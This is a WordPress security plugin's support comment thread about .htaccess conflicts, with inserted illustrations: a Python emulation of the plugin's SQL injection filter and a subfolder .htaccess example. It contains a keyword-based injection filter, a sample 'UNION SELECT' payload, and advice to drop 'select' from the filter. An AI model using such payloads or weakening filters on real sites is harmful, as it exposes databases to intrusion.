    All is well when activating default mode and deleting wp-admin htaccess.
    Can also activate BP Mode for admin but as soon as I activate BP Mode for the site everything goes. The BPS page has no style and when I try to view the site or reaccess admin I get 500 error message. The only way to get back in is to use FTP to remove htaccess file.

    Also following info showing in system info:
    Server Type: Apache/1.3.41
    Operating System: Linux
    Multisite: Multisite is not enabled
    PHP Version Check: √ Running PHP5

    Any thoughts.

    • AITpro Admin says:

      Wow i’m glad you added the system info. This version of Apache has reached End of Life and is no longer maintained or supported. The current stable version is 2.2 and a 2.3 Beta has been released. I have no idea if BPS will work on this outdated Apache Server software, but without even going into that 1.3.41 has known security vulnerabilities that were corrected in 1.3.42. In other words, 1.3.41 is not a secure Apache version. What i recommend is you contact the host and ask them why they are using an insecure and outdated version of Apache. Then if you get an answer that you can work with or a good explanation for the host being years behind the times then the things to check next would be if this host allows Options in an htaccess file. Very few hosts do disallow this to be used in custom .htaccess files and it will cause 500 errors. The CSS style issue is probably just related somehow to the bigger problem. Comment out Options -Indexes and make sure that the Master .htaccess files are being created with the correct RewriteBase and RewriteRule for this site when you click the AutoMagic buttons to create the Master .htaccess files. If everything looks ok at this point then Activate BulletProof Mode for the Root folder and see what happens. Thanks.

  15. David Mitchell says:

    Hi, when BPS is activated, it interferes with the functioning of the Event Espresso plugin. When I’m using Event Espresso and I try to “Add An Event”, I go to that screen and click on the date selector, and I get the following error message:

    403 Permission Denied
    You do not have permission for this request /wp-content/plugins/advanced-events-registration/calendar_form.php?
    objname=start_date&selected_day=0&selected_month=0&
    selected_year=0&year_start=2011&year_end=2021&
    dp=1&mon=&da1=&da2=&sna=&aut=&frm=&tar=&inp=&fmt=d-M-Y

    When I turn BPS off, then the calendar control date selector appears just fine without an error message. I’ve tried using “Automagic” to generate my htaccess files hoping that it would create an exception for the Event Espresso plugin, but it doesn’t seem to do so.

    Can you help me? Can you tell me how I need to modify my htaccess file to Event Espresso can work even when I have BPS turned on?

    Thank you.

    • AITpro Admin says:

      Hi yep this is a fairly common problem with plugins that have calendars or plugins that include a custom search. What BPS is seeing as a threat is the word “selected”. This is easy enough to fix by removing the SQL filtered word / command “select” out of the SQL Injection filter in your root .htaccess file. I wish plugin authors would choose another word to use in queries instead of “select”. The words “select” and “selected” are commonly used words in forms and because they make sense people use them in queries, which is NOT necessary. If the word “chosen” was used instead then there would not be a conflict and it would not create a possible security vulnerability that could be exploited. By removing the word / SQL command “select” you are still pretty much just as protected because the SQL command SELECT would have to be used in combination with some of the other filtered SQL commands in order to do damage to your site. But with the SQL command SELECT not being filtered it is possible that someone could retrieve some data from your WordPress Database. If you are storing sensitive financial data or other sensitive data that you don’t want anyone to see then make sure that it is hashed / encrypted. The SQL SELECT command is used to get data from your MySQL database so of all the SQL commands it is one of the less dangerous ones. INSERT and DELETE would obviously be a lot more dangerous to remove from your root htaccess BPS SQL Injection filter. So open your Root htaccess file in the BPS editor, scroll down to the SQL Injection filter and remove “select” from the SQL Injection filter like I have done below.

      RewriteCond %{QUERY_STRING} ^.*(execute|exec|sp_executesql|request|insert|union|declare|drop|delete|create|alter|update|order|char|set|cast|convert|meta|script|truncate).* [NC]

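
As an added illustration (not code from this page, from BPS, or from Event Espresso), the Python below emulates how the `RewriteCond %{QUERY_STRING} ... [NC]` line above matches: it runs the Event Espresso query string quoted in the comment and a constructed UNION query through the posted filter and through a reconstructed pre-edit copy with `select` added back (where that token sat in the original list is an assumption). It shows why "selected_day" trips the filter and why a UNION SELECT is still caught once "select" is gone.

```python
import re

# Filter exactly as posted in the reply above (the "select" token removed).
SQL_FILTER_WITHOUT_SELECT = (
    r"^.*(execute|exec|sp_executesql|request|insert|union|declare|drop|delete|"
    r"create|alter|update|order|char|set|cast|convert|meta|script|truncate).*"
)

# Reconstructed pre-edit filter: the same list with "select" added back.  Where
# the token sat in the original list is an assumption; it does not affect matching.
SQL_FILTER_WITH_SELECT = SQL_FILTER_WITHOUT_SELECT.replace(
    "|truncate)", "|select|truncate)"
)

# Query string from the Event Espresso 403 error quoted in the comment above,
# re-joined onto one line.
EVENT_ESPRESSO_QS = (
    "objname=start_date&selected_day=0&selected_month=0&selected_year=0"
    "&year_start=2011&year_end=2021&dp=1&mon=&da1=&da2=&sna=&aut=&frm=&tar="
    "&inp=&fmt=d-M-Y"
)

# Constructed sample of the kind of query string the filter is meant to stop.
UNION_QS = "cat=1 UNION SELECT 1,2,3"


def rewritecond_matches(query_string: str, pattern: str) -> bool:
    """Emulate `RewriteCond %{QUERY_STRING} <pattern> [NC]`.

    mod_rewrite tests the pattern as a regex against the raw query string and
    the [NC] flag makes the comparison case-insensitive.  Because the pattern
    is wrapped in `^.*(...).*`, a token appearing anywhere in the query
    string, even inside a longer word, is enough to match.
    """
    return re.search(pattern, query_string, re.IGNORECASE) is not None


def tripped_tokens(query_string: str, pattern: str) -> list:
    """List the filter tokens found inside the query string, in filter order.

    Useful when debugging a 403: it shows which word tripped the filter, e.g.
    that "selected_day" matches the "select" token by plain substring matching.
    """
    group = re.search(r"\((.*?)\)", pattern).group(1)
    haystack = query_string.lower()
    return [token for token in group.split("|") if token in haystack]


if __name__ == "__main__":
    for label, qs in (("Event Espresso calendar", EVENT_ESPRESSO_QS),
                      ("constructed UNION query", UNION_QS)):
        for name, pattern in (("with select", SQL_FILTER_WITH_SELECT),
                              ("without select", SQL_FILTER_WITHOUT_SELECT)):
            blocked = rewritecond_matches(qs, pattern)
            print(f"{label:24} {name:15} blocked={blocked!s:5} "
                  f"tokens={tripped_tokens(qs, pattern)}")
```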
  16. David N says:

    Thank you for making what I hear is a very good plugin. I am struggling to get it to find my .htaccess file though.
    Sub folder install. From what I am reading, having wordpress installed in a sub folder should not be a problem.
    Followed directions on this page for the install;
    Giving_WordPress_Its_Own_Directory

    My “root” folder is; example.com/opw/ (where wp is installed)
    The “root” folder .htaccess file is in example.com/ BulletProof can’t find the .htaccess file.

    System Info page
    Website Root Folder: example.com/opw
    Document Root Path: /home/username/example.com
    WP ABSPATH: /home/username/example.com/opw/
    WordPress Installation Folder: /
    WordPress Installation Type: Root Folder Installation
    WP Permalink Structure: /%postname%.html

    My site has been operating fine with no plugins needing to be installed manually including BulletProof.
    Is there a way to manually point BulletProof to the correct “root” location?
    Am I hopelessly lost?

    A side note maybe. If I manually set my RewriteBase and RewriteRule folder paths to include the sub folder as explained in “For Website Owners With WordPress Installations In Subfolders”
    and then go click save under my permalinks, the manual edits are removed.
    I must be missing something.
    Thank you
    David

    • AITpro Admin says:

      Hi,
      A couple of people have asked me about this already. I realize without a comment search feature it is a pain in the rear to try and sort through them. One of these days very soon I will add a comment search feature. The latest comment about this issue and my response can be found in the comments on June 4, 2011. My first question is why do you want to have WordPress in its own directory when you can migrate the site in less than 10 minutes by doing it in your host control panel? I ask this question every time when someone is doing this method. 😉 The other thing that i see that i think really doesn’t benefit your site in any way is using .html on the end of your permalinks structure. I remember seeing an old video about this in 2009. The video was put together by people hyping something and trying to pitch something. I experimented with it any way years ago and found it to be a total waste of time. If you did this because an “SEO expert” recommended or suggested this somewhere on the Internet then well you might want to double check that info. 😉 The other thing is you should always start your permalink structure with a numeric value for best performance. I created a post about the best permalink structures to use and why and with reference links to very credible sources. Now back to your issue. In a nutshell, I believe you are going to have to do some old fashioned manual FTP stuff if you want to use the “Giving WordPress Its Own Directory” method. If i remember correctly the problem is that BPS sees the folder that it thinks WordPress is in and not the actual folder where WordPress is when you use this method so you will have to do manual editing of the htaccess files and put them where you want them manually via FTP instead of using any of the automatic features in BPS. Thanks.

      • David N says:

        Why its own directory is easy. Just last week within 3 hours of installing a plugin, I had 4 “referral” clicks to the default location of where that plugin would have been installed if I had used the default install of WP. That plugin has been deleted and their IPs blocked.

        Thank you for the comments and directions.
        David

        • AITpro Admin says:

          Yep it’s super easy to do. I was using WP in its own directory many years ago and after running into so many problems with it I finally threw in the towel with trying to make it work for my purposes and just migrated the site. Now if you are just doing standard stuff with WP then you will probably be fine. I had several advanced and custom coding things set up and built into WordPress and they would fail intermittently for various reasons. Not sure what you mean by referral clicks. I guess you mean the plugin had 4 links going back to the plugin authors site or other sites? That’s a bit greedy. LOL FYI – Bots sniff out forms and code by searching for code itself so they will find the code no matter where you put it visually for humans. Unless of course you block the code / file with .htaccess or some other sniffing deterrent or of course password protecting a directory. 99% of all hacking recon is done using Bots sniffing for code vulnerabilities. When a vulnerability is detected by a Bot then a human might sometimes step in and do some manual hacking work, but most of it is automated. The Bot program finds a vulnerability and automatically delivers its pre-coded payload without the human hacker who wrote the Bot program ever even looking at your website. FYI – blocking IPs is less effective than blocking host names. IP addresses can be changed very easily or spoofed very easily, but a host name is a much more constant factor. Thanks.

          • David N says:

            Referral clicks meaning someone clicked a link to reach the file at /wp-content/plugins/wp… leaving off the last part. The “wp-content” folder does not exist on my site under that name or in the default location.
            Same as if someone clicks a link in google or facebook as far as I know but that isn’t saying much. It was reported as a referral click which is how it shows if I post a link somewhere and it’s clicked on…
            I understand it only keeps me off the radar for less intelligent attacks but so far I am happy with the results despite the extra work.
            I am very new to all of this and learning and implementing as I go. No custom coding!

            Thanks for the heads up on host names vs IP. More to figure out, yay!
            Also will have to figure out what the heck to do for blocking code files too since my site went down yesterday. No clue what happened. So much to learn. YAY for backups!

          • AITpro Admin says:

            Oh ok you mean the HTTP referrer, which is counted as a referral click. I got what you mean now. 😉 Yeah the real dangerous players work on a totally different level than surface HTTP methods. If a hacker is good he has created automated sniffer bots using python, nix or other coding languages that follow URLs just like good bots and also work on a totally different level basically like a search and find approach instead of traversing URLs. So for example if you have an app or plugin installed on your website that has a known vulnerability or exploit then these automated sniffers will find it without having to follow any URLs. Gnarly eh? LOL Take a look at the Nikto Scanner software to get a basic idea of how other methods of search and find scanning are done by good guys and bad guys. Thanks.
            Ed

  17. Evan says:

    Hi, I noticed that with the secure mode, if you have phpmyadmin under the root directory, certain pages from phpmyadmin will not operate such as sql.php, tbl_create.php, any recommendations on removing a whole directory from the .htaccess file?

    • AITpro Admin says:

      Is this the WP-phpmyadmin plugin? If so, see this post about it >>> Sucuri post on the WP-phpmyadmin plugin. If this is not the plugin you are using then please let me know which plugin it is. Thanks.

      PS The Adminer WP plugin has been tested with BPS and a fix has already been created for this phpmyadmin plugin.

      *** UPDATE ***
      Adding an .htaccess skip rule to your root .htaccess file will correct this problem.

      # phpMyAdmin folder skip rule for sql.php and tbl_create.php problems
      RewriteCond %{REQUEST_URI} ^/path/to/the/phpmyadmin/folder/ [NC]
      RewriteRule . - [S=30]
      
  18. edyzen says:

    hello all
    BulletProof Security gives me a suggestion of permission 755 for my root folder ../
    How to do it? Any idea? Many thanks

    • AITpro Admin says:

      You can ignore that suggestion. I keep meaning to remove that from the file and folder permission checking. Thanks.

      • edyzen says:

        Two great plugins, BulletProof Security and WP Security Scan, have given me the suggestion to change the permission of the root folder (root directory) to 755. I think this is a good suggestion, and I must change the permission to 755. Can you help me? How to do it? Many thanks

  19. matthew/mofx says:

    Hey AITpro, I’m having issues with 404s, from the admin page, and losing functionality in the wordpress backend, such things as unable to empty spam, change widgets, etc. I turned off BPS and everything started working fine again, wondering if you had any insight. Not really a code monkey so this stuff is kind of foreign to me. Thanks for your help again.
    matthew

    • AITpro Admin says:

      Check that the wp-admin BulletProof Mode is activated. The Root and wp-admin BulletProof Modes must be activated together. If you did activate the wp-admin BulletProof Mode, but there is a permission issue either with the /wp-admin folder or the /wp-admin .htaccess file then you will also get 404 errors. The folder permission for /wp-admin should be 755. The file permission for the /wp-admin .htaccess file should be 644. Also i see that you are using WPSC for caching so manually double check your root htaccess file to make sure everything looks ok if you are using WPSC mod_rewrite. BPS has built in checking for WPSC problems, but it can’t catch every possible problem with WPSC. Thanks.

      • matthew/mofx says:

        Hey AITpro Admin, I’ve done everything you said above and I’m still having issues with 404’s from the admin page. Any more insight you could give, maybe a cache program that works better with BPS?
        Thanks for your help.
        matthew/mofx

        • AITpro Admin says:

          You have a lot going on with the Theme you are using so maybe the 404’s are due to some custom structure that you have set up? I am unable to determine if your site is based on an existing Theme or if it is completely custom. Please email me directly edward[at]ait-pro[dot]com since this appears to be a non-standard or customized site specific issue. Take screenshots of the BPS Security Status page, System Info page, the WordPress Permalinks Settings page and screenshots of the actual 404 errors that you are getting. Download the .htaccess file that is in your site’s root folder and the .htaccess file in your wp-admin folder and send them to me. Also since your host is Dreamhost you have a lot more advanced options in regards to .htaccess files and other security measures. You may have some sort of conflict going on with either .htaccess files or possibly a custom php.ini file. Dreamhost offers the most advanced options to the end user of any web hosting i have ever seen, but with that advanced capability comes more time spent at the Dreamhost Wiki. 😉
          My personal favorite caching plugin is W3 Total Cache and BPS and W3TC play very nice together. WPSC does not play so nice with BPS. Thanks.

  20. Tony says:

    Hi,

    I use OpenX to serve ads on the site. After installing and activating the plugin all the ads stopped working.

    Was wondering if there is a solution to this?

    Thank you.

    Tony.

    • AITpro Admin says:

      Your site is what i consider a SPAM site. I got immediately blasted with SPAM ADS when i tried to view your website. Sorry, but i can’t help you.

      • Tony says:

        Are you talking about the pop up?
        Thank you for noticing that!!

        Our site has been getting attacks and we kept restoring from staging server. That plugin must have been activated on the staging and we forgot to turn it off.

        This is why we installed the BulletProof Security

        Sorry about that any case.

        • AITpro Admin says:

          Well now when i try and look at your site a media player window launches right away. It appears that you have a lot of technical coding problems going on with your site right now and that is probably why your site is so easy to hack. When i look at your source code i see that OpenX is in your source code, but i cannot tell you if you have manually added this or this is a plugin. I will need to remove all of your links pointing back to your site in your comments due to the media player launching automatically. This is a method used by hackers to infect computers. It does not appear that it contained a payload, but I cannot allow a link like this to exist on my site. Let me know when you have the technical aspects of your site figured out and also i would need specific information on how you are implementing OpenX before i can offer any help. I will restore your site links once you have corrected the technical problems on your site. Thanks.

  21. matthew says:

    Admin,
    Love the plugin, but have a question, I’m running a modified php.ini file for larger uploads, memory limit, post size, and script execution time. When I install your plugin and look at my system info all these settings have changed back to the normal php values. Does your plugin rewrite these somewhere? Do you know what’s happening? Thanks.

    • AITpro Admin says:

      BPS uses new pre-made Master htaccess files so if you had existing htaccess files that had custom htaccess coding in them then by activating BulletProof Mode in your Root folder you would overwrite your existing Root htaccess file. If you made a backup first then you can restore that old htaccess file then use the BPS built-in File Editor and create a new Master htaccess file based on your old htaccess coding and combining it with the new secure.htaccess Master file. BPS does not alter or write to your php.ini files. BPS only works with htaccess files. With that said Dreamhost allows you to use “flags” in your htaccess file to control your php.ini directives via htaccess.

      You’re probably already aware of this – your web host, DreamHost, offers the most user control and advanced htaccess options of all the web hosts that i have ever seen. Meaning that you can do a lot more things with htaccess on DreamHost hosting. This also means that things are a little more advanced and complex. DreamHost has their own Wiki that has excellent and precise instructions on everything that you can do on their hosting servers.

      So most likely what happened is you had custom htaccess code in your root htaccess file that contained flag directives that controlled your php.ini settings for this particular domain. At least this is a logical guess anyway. 😉 It really all depends on where you made the original changes. And just adding those changes back or doing something new with the BPS htaccess files. Take a look at the DreamHost Wiki for all the options available to you – and there are many, many different options. Thanks.

      Oh and one last general thing about htaccess files. They are hierarchical, meaning that if a parent folder has an htaccess file and a child or subfolder of that parent does not have an htaccess file then the parent htaccess directives will be applied to that child folder. If the parent folder has an htaccess file and the child folder has an htaccess file then the htaccess directives in the child folder apply to only the child folder and the parent htaccess file directives will be ignored in the child folder.

  22. Daniel says:

    I am currently using idev affiliate. It has mod Rewrite code that goes in the .htaccess file above the following code:

    # BEGIN WordPress

    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]

    # END WordPress

    I want to use BPS Security plugin. Is it ok to just add the idev affiliate rewrite code into the secure.htaccess file? Here is what Idev says: “This code must be placed at the very top of your .htaccess file, before everything else in the file.”

    Also, i have a subdomain on my server. the folder has a script in it and is located in the root domain as is my wordpress site. I have the subdomain pointing to that folder. The following code is in my .htaccess to redirect if someone happens upon the folder:

    # END WordPress
    RewriteCond %{HTTP_HOST} ^freeclassifiedproducts\.com$ [OR]
    RewriteCond %{HTTP_HOST} ^www\.freeclassifiedproducts\.com$
    RewriteRule ^members\/?(.*)$ "http\:\/\/members\.freeclassifiedproducts\.com$1" [R=301,L]

    How and where do I put this code in the secure.htaccess file?

    Thanks a bunch.

    Daniel

    • AITpro Admin says:

      Yep I assume it is ok to add idev htaccess code above the WordPress mod_rewrite if that is what the plugin author is instructing you to do. I assume that htaccess code will have REQUEST_URI rules in it or SSL / HTTPS rewriting rules. You will know right away if that is not going to work because when you click on any category links you will get 404 errors or other HTTP errors. The BPS Exploit filters work in a way that where they are located in the order of your root htaccess file is not important. Since the Exploit filters are based on conditions this means that when any condition specified in the Exploit filters is met that is not allowed someone is automatically sent to your Forbidden page.

      Yep i see that your subfolder / subdomain rewrite is currently working correctly on your site to rewrite the /members folder to this subdomain URL members.blah.blah. Since this is a conditional rule the order of where it goes in your root htaccess file is not important. When that condition is met that rule will automatically work. Personally I would put it right after your # END WordPress mod_rewrite code just like you are showing in your comment. Thanks.

      • Daniel says:

        My question is actually is it ok to put the idev code above the line:

        # BULLETPROOF .46.3 >>>>>>> SECURE .HTACCESS

        Will that affect the plugin at all other than an error message?

        Would it be better to put the iDev code between lines 1 and 3 of your secure.htaccess file (see below):

        # BULLETPROOF .46.3 >>>>>>> SECURE .HTACCESS
        (iDev Code goes here)
        # If you edit the line of code above you will see error messages on the BPS status page

        Thanks,

        Daniel

        • AITpro Admin says:

          Oh you meant literally the top of the htaccess file. Well if you place code above the commented out line # BULLETPROOF .46.3 >>>>>>> SECURE .HTACCESS then yes this will cause BPS not to display the correct status information on the BPS Status page. So yes you will get error messages, but BPS will function correctly. Since that is a commented out line in the htaccess file it does not count for anything other than BPS checking the version number. So you should just add your htaccess code below this commented out line. It will be seen as the first line of “active” htaccess code in the htaccess file. Thanks.

    • Daniel says:

      So I installed the root .htaccess code. Everything seemed to work fine but the code stopped me from deleting a user. I run a membership site. Is this a common problem? Any suggestions?

      Regards,

      Daniel

      • AITpro Admin says:

        Sounds like you did not activate the wp-admin BulletProof Mode. The Root and wp-admin BulletProof Modes must be activated / used together. Thanks.

  23. John Smith says:

    Since installing BulletProof Security on my WordPress 3.1.3 site hosted by DreamHost, my website stats are no longer available at http://www.nameofsite.com/stats/. Renaming .htaccess gets the stats working again. Is there a change I can make that will allow the stats report to run while keeping BulletProof Security installed? Thanks!

    • AITpro Admin says:

      To view your stats with DreamHost you will need to add this htaccess code to your root htaccess file. The # BEGIN WordPress to END WordPress htaccess code already exists in your root htaccess file so you are just adding the new IfModule code below (it goes above your existing WordPress htaccess code exactly as shown below). Your RewriteBase for the new stats htaccess code that you are adding should be the same as your WordPress RewriteBase. Thanks.

      RewriteEngine On
      RewriteBase /
      RewriteCond %{REQUEST_URI} ^/(stats|failed_auth\.html).*$ [NC]
      RewriteRule . - [L]
      
      # BEGIN WordPress
      RewriteEngine On
      RewriteBase /
      RewriteCond %{REQUEST_FILENAME} !-f
      RewriteCond %{REQUEST_FILENAME} !-d
      RewriteRule . /index.php [L]
      # END WordPress
      
  24. Veliremus says:

    Dear AITPro,

    I’ve been using Bulletproof Security for a while now, and I’m very pleased. There’s just one problem I’d like some advice on. So long as the root .htaccess is active, I cannot install another WordPress in a sub-directory. Disabling it and then installing helps, but when I enable it again, some functionality is lost (e.g. I am denied access to some pages, which means I can’t delete plugins, for example). I’ve seen this link in the FAQ: http://www.ait-pro.com/aitpro-blog/1166/bulletproof-security-plugin-support/bulletproof-security-plugin-guide-bps-version-45/#modifying-htaccess-files

    But it is unclear to me as to how this would help me. Is there a way for me to add an exception to the root .htaccess, or something, so that I can fully use my second (actually third) WordPress installation?

    Thanks in advance,

    Veliremus

    • AITpro Admin says:

      Each site should have its own installation of BPS and that means that each site would have its own htaccess files in the folders for each site. I took a look at your site and it does not appear that you have an MU or a Network site. BPS would not block installation of an additional WordPress site so I am not sure what this means – “I cannot install another WordPress in a sub-directory”. The other issue with being blocked from deleting plugins and other administrator functions being blocked means that the wp-admin BulletProof Mode is not activated. Both the Root and wp-admin BulletProof Modes must be activated together for everything to work correctly. The old manual instructions are confusing and will eventually be removed or rewritten so disregard them. Please explain in detail what you mean by installing additional WordPress installations. Thanks.

      • Veliremus says:

        Thanks for your reply.

        Okay, here’s the deal. I have, at the moment, three WordPress installations. One is my root, one is my blog (/presstoplay/) and one is a new site I’m working on, which is currently housed in a sub-directory. My root and my blog are protected by Bulletproof. This new site isn’t yet.

        What happened was: I made a sub-directory to the root (veliremus.com/newfolder/) and uploaded all the WordPress files there. But when I tried to install, I got a “Permission denied” even though all permissions were set correctly. I then found out that the .htaccess made by Bulletproof in the root was the source of the problem. As soon as I disabled that by temporarily renaming it, I could install WordPress.

        After the install, I enabled the .htaccess again. This caused some problems with permissions again, like me not having permission to view a certain php file, and when I tried to delete plugins, the same came up, instead of an “are you sure?” prompt. You get links like this, it can’t access: wp-admin/profile.php?updated=true (this happens when I update my profile. I can get to the page, but as soon as I click Submit, I get a Forbidden).

        Now, I have just Bulletproof on my new WordPress installation, and this solves the problems, it seems. But I’d just like to know, if anything like this happens again, I can just temporarily disable the .htaccess, right?

        • AITpro Admin says:

          *** This only applies to someone who is doing a manual installation of WordPress in a new subfolder / site under a parent folder / site that has BPS installed ***
          Ok I understand now. Either the “Permission Denied” error message was the WordPress default / general / all purpose error message when trying to access an admin area or the permission denied was either your host’s 403 Forbidden page or a custom 403 Forbidden page that you set up in BPS. When doing a manual installation of WordPress you would need direct browser access to /readme.html and /wp-admin/install.php. The FilesMatch section of the root htaccess file blocks direct browser access to the /wp-admin/install.php file and the /readme.html files unless you uncomment the Allow from line and add your current IP address or temporarily remove those files from the FilesMatch section of htaccess code or comment out the whole FilesMatch section of htaccess code or the simplest solution of all – just temporarily put your root site in Default Mode to perform a subfolder installation. Now with htaccess files in general they are hierarchical meaning that if a parent folder has an htaccess file and a child folder does not have an htaccess file then the parent’s htaccess file rules will be applied to a child folder or any and all subfolders under the parent folder. So another approach could also be to upload the default.htaccess file to your new subfolder and rename it to just .htaccess. BUT BE SURE TO MANUALLY ADD THE CORRECT REWRITERULE AND REWRITEBASE TO THE HTACCESS FILE FIRST. So you would be adding this first RewriteBase /newfolder and RewriteRule /newfolder/index.php. For exact and detailed instructions on manually editing htaccess files see the BPS Guide. Ok so the main idea is that each website should have its own htaccess files – 1 in the root and 1 in the /wp-admin folder. When you have a subfolder under a parent folder that has an htaccess file in it and the subfolder does not have an htaccess file in it then the subfolder is following the rules in that parent htaccess file. So obviously this would not work for the subfolder site because URL rewriting would be rewriting to the parent folder and not the subfolder. i.e. the index.php file under your new subfolder would be trying to rewrite to your root domain = not going to work right. 😉 Thanks.
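
The subfolder site's own .htaccess that the reply above calls for is the standard WordPress rewrite block with RewriteBase and the final RewriteRule pointing at the subfolder. The fragment below is an added example, not taken from the page or from the BPS default.htaccess file; /newfolder is the placeholder folder name used in the reply.

```apache
# /newfolder/.htaccess (added example for a WordPress site installed in /newfolder)
# This is the rewrite block WordPress generates for a subdirectory install;
# it is not the BPS default.htaccess file and carries none of the BPS filters.
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
# RewriteBase and the catch-all rule must both name the subfolder, otherwise
# pretty permalinks under /newfolder/ are rewritten to the parent site's index.php
RewriteBase /newfolder/
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /newfolder/index.php [L]
</IfModule>
# END WordPress
```

Two inheritance rules explain why the subfolder needs this file. A child folder with no .htaccess of its own follows every rule in the parent's .htaccess, including the parent's rewrites, so requests under /newfolder/ end up at the parent's index.php. Once the child has its own .htaccess with RewriteEngine On, the parent's mod_rewrite rules are no longer applied to it (mod_rewrite does not inherit per-directory rules unless the parent sets RewriteOptions Inherit), which is also why the parent's query string filters stop covering the subfolder and each site needs its own copy. Directives other than mod_rewrite's, such as the parent's FilesMatch block, do still apply to the subfolder.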

          • Veliremus says:

            Sorry, forgot to leave a comment. It worked. I had the same problem with installing phpBB today, so I copy-pasted the default.htaccess, modified it, and then added phpBB’s addition. That works :). Thanks for the assistance!

  25. Bill says:

    Hello, AITpro.
    My website has been up for a few months. Soon after publishing, I had GoDaddy site scanner installed. Last month, it ran a scan and revealed that the site was susceptible to xss (and every relative attack, I’m sure). Since this revelation, I’ve been somewhat paranoid of every blank field, drop down menu and URL I’d see… I disabled my search bar (text field), removed every contact or form related plugin (indefinitely) and I’ve been on a quest to protect the site ever since. Then, I read about your plugin on WP.org… which led me here.

    I’ve read about people using Super Cache and various other plugins seeking your acumen re: compatibility issues, error messages and the like. But, admittedly, I’m very new to website security and my site has simple plugins and widget functionality now. I’m simply hoping to enable my search field again and two forms on my site w/o worrying endlessly about hacking attacks. I’m not versed in the true functionality of or need for Super Cache and other plugins I read about in your plugins threads, but as it stands, that’s all I’m looking for is something that will protect my site, entry fields and URLs from being manipulated or changed (aka hacked).

    In looking at my htaccess file — though I don’t understand it line-for-line, it seems pretty short and sweet. I did back-it-up via FTP and I’m ready for BPS. That said, is there anything you think I (someone new to website security and simply seeks the protection described) should know or be made aware of before downloading and/or installing BPS? And, will installing BPS not only protect my search field from attack, but also any contact form I use on my site? Please let me know if you would need a link to my site to better answer the questions posed.

    Side note: I was using CCF (custom contact forms), but removed it after the scan resulted in text field vulnerability. I’d like to reinstall that one (if you recommend it) or use another form with customizable options in the very near future.

    In closing, I’ve been reading about BPS on here, WP and at least one other site, and I have to say that you are the most thorough, accessible and informed authors I’ve ever seen! That effort needs to be commended and compensated. Something I surely intend to do.

    -Bill

    • AITpro Admin says:

      Hello Bill,

      Welcome to the wonderful world of website security awareness. LOL It sucks that we have to be prepared against the worst, but I guess pretty much everything in life is like that. 😉 Better to be prepared than be surprised by an experience you don’t want to have – your website being hacked.

      The Query String Exploits Filters are designed to block the code that would be used in a website hacking attempt. So basically what happens is if someone is trying to run a script against your website to hack it and that script contains any of the code that is blocked in the Query String Exploits filter then the hackers script fails against your website. Very simple and very effective. 😉

      It is possible and even likely that even after installing BPS you will still get a warning about the CCF form, but BPS will block the hacking scripts that would be used in hacking attempts made by entering those scripts into the form text field. What BPS cannot block against in regards to forms is if the form action itself does something that is considered dangerous like file uploading. Since CCF is just a contact form then there really is not that much that can be exploited and the same applies to your search window. In the past one of the most common exploits done on a search text field was an SQL Injection exploit. WP blocks against this already and with BPS in place any code that is blocked in the Query String Exploit filters will not be allowed and the script will just die or if you have a 403 Forbidden page set up then the person running the script (usually an automated Bot) will be sent to your 403 page. I’m sure if I ran a scan on my site’s search window it would also tell me that it could be exploited, but BPS will filter out any code that is not allowed so there is nothing to worry about.

      Thanks for the Mega Kudos!!!

      Best Regards,
      Ed

      • Bill says:

        Thank you very much for your detailed response.

        Last question before downloading BPS: GD site scanner support gave me a test code to enter into the search field to test for vulnerability. I won’t enter here, but it was a script that, once entered into the search field, would simply execute a pop-up “alert.”

        That said, upon installing/running BPS and re-enabling my search field, would that code still work because it’s just a test script and not an actual hacking attempt?

        • AITpro Admin says:

          To be able to tell you what the test script’s realistic capabilities are or the accuracy in a real life hack situation I would need to see the test script. You can email it to me via my contact form if you want and I’ll let you know that info. Thanks

          • Bill says:

            Hi, Ed.
            And, Thank You for the allotted time.
            Please note that I recently submitted the test code via your contact form. Feel free to post your findings here rather than emailing me back.

            Thanks again,
            -Bill

  26. Mike says:

    Hello,

    Been using BPS for a couple months, no issues.

    One question;

    Are there any known issues with Adsense?

    I have a site with Adsense, all is well, updated BPS this morning and now I’m missing one ad in one location. The placeholder exists…it’s just blank. All other ad locations function normally.

    I know correlation doesn’t prove causation, and I’m not saying this has anything to do with BPS, just thought I’d ask (the ad stopped displaying correctly right after the upgrade to latest BPS this morning. Who ever knows what freaks out the big “G”).

    Thanks for the help.

    Cheers!
    Mike

    • AITpro Admin says:

      I am not aware of any issues with BPS and Adsense. I looked at your site and see an iframe that is not loading the page successfully. It is under your adsense section of coding so this appears to be the one you are referring to. When I check the link that this ad goes to I get an authentication failed! error message. Is the link valid? Check to make sure that this particular ad is valid. Other than that I don’t see any strings in the link that BPS would be blocking. It just appears that that particular ad has a problem or has an invalid link. I checked some of your other iframes ie your Google maps and they are loading fine so BPS is not blocking iframes in general so once again check to make sure the link is valid for that particular iframe ad. Thanks.

      *** Update ***
      The ad’s URL link contains #038; – this might be automatically inserted by WordPress or maybe the people you are getting the ad from meant to use &amp;. Either way this is the problem with the URL link. At least this is the most obvious thing that does not seem correct.

      • Mike says:

        Thanks for the help. That iframe at the bottom is an airport departure widget. What I was referring to is the 160×600 Skyscraper in the upper right corner.

        Anyway, I’ll keep poking around. I’m beginning to think that the geo targeting is keeping g from showing ads to me because I live in the United States, not Ireland.

        Thanks for the help.

        • AITpro Admin says:

          Wow, I just looked again and something is really odd. The iframe tag for that ad does not exist in your source code. I thought I was looking at the right ad, but there is not another iframe tag in your source code. Could the problem be that the iframe tag is missing because it has not been added correctly for that Ad?

          Thanks.

  27. Locarchism says:

    I upgraded to .46.3 this morning, and when I updated the root .htaccess and copied over the W3 Total Cache elements, the server promptly 500ed on all requests. Restoring the .46.2 resolved the error. I did comment out the Options -Indexes line, but that didn’t fix the problem.

    I can send you the relevant files if you’d like to see them. In the meantime, I’m running with the .46.2 root .htaccess file. Should I be concerned by this configuration?

    • AITpro Admin says:

